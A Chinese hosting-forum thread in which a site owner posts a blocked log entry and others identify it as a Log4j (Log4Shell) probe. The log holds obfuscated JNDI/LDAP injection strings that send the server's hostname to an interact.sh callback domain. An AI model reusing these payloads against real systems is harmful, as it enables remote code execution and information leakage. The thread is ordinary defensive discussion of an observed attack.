全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 635|回复: 7

这是个什么攻击方式?

[复制链接]
发表于 2021-12-14 10:41:08 | 显示全部楼层 |阅读模式
今早看了下日志,发现有一条这样的的记录

  1. {"client_ip":"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh}","local_time":"2021-12-14 05:58:45","server_name":"xxx.com","req_url":"\/?x=${jndi:ldap:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gg.interact.sh\/a}","attack_method":"Deny_URL_Args","req_data":"-","rule_tag":"\\$\\{","user_agent":"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7ge.interact.sh}"}
复制代码


居然看不到IP,有带老懂吗
发表于 2021-12-14 11:20:33 | 显示全部楼层
正在 Ping c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh [46.101.25.250] 具有 32 字节的数据:
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=175ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
发表于 2021-12-14 10:44:47 | 显示全部楼层
这不就是大红大紫的log4j漏洞么。
发表于 2021-12-14 11:09:48 来自手机 | 显示全部楼层
是 log4j2 漏洞,互联网的小学生都知道了
发表于 2021-12-14 11:11:20 | 显示全部楼层
loliwin 发表于 2021-12-14 10:44
这不就是大红大紫的log4j漏洞么。

wp 小站 需要怕吗?
发表于 2021-12-14 11:18:34 | 显示全部楼层
wp站不是PHP的嘛,log4j好像是java项目的。是不是有其他组件用到了。没看到IP地址,但是他里面不是有域名嘛.sh的域名
发表于 2021-12-14 11:20:55 | 显示全部楼层
昨天好几个网站都碰到了这个,宝塔的防火墙还是可以的,都给拦截了
发表于 2021-12-14 11:34:04 | 显示全部楼层
Apache关我nginx什么事
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-20 19:09 , Processed in 0.070532 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表